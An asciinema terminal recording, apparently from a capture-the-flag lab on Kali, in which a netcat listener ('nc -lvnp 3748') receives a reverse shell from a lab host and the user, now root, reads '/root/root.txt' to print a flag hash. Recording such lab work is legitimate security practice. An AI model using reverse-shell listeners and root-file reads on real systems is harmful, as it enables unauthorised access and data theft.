{"version": 2, "width": 175, "height": 20, "timestamp": 1604966953, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.029639, "o", "\u001b]0;kali@kali: ~\u0007\u001b[1;34mkali@kali\u001b[00m:\u001b[1;32m~\u001b[00m$ "]
[0.952972, "o", "n"]
[1.164407, "o", "c"]
[1.404157, "o", " "]
[1.505606, "o", "-"]
[1.700633, "o", "l"]
[1.784787, "o", "v"]
[1.985065, "o", "n"]
[2.148296, "o", "p"]
[2.265048, "o", " "]
[3.281008, "o", "3"]
[3.578679, "o", "7"]
[4.131654, "o", "4"]
[4.233842, "o", "8"]
[4.984766, "o", "\r\n"]
[4.986506, "o", "listening on [any] 3748 ...\r\n"]
[8.042417, "o", "connect to [10.10.15.31] from (UNKNOWN) [10.10.10.209] 54452\r\n"]
[8.045566, "o", "/bin/sh: 0: can't access tty; job control turned off\r\n# "]
[12.891475, "o", "c"]
[13.900204, "o", "a"]
[14.163323, "o", "t"]
[14.272937, "o", " "]
[14.513215, "o", "/"]
[14.69099, "o", "r"]
[14.784955, "o", "o"]
[14.940052, "o", "o"]
[15.008995, "o", "t"]
[15.338737, "o", "/"]
[15.522564, "o", "r"]
[15.761481, "o", "o"]
[15.928962, "o", "o"]
[16.057801, "o", "t"]
[16.154801, "o", "."]
[16.457047, "o", "t"]
[16.643146, "o", "x"]
[16.747013, "o", "t"]
[16.977345, "o", "\r\n"]
[17.206673, "o", "71922e84062a58edbb623b234776450b\r\n"]
[17.429513, "o", "# "]
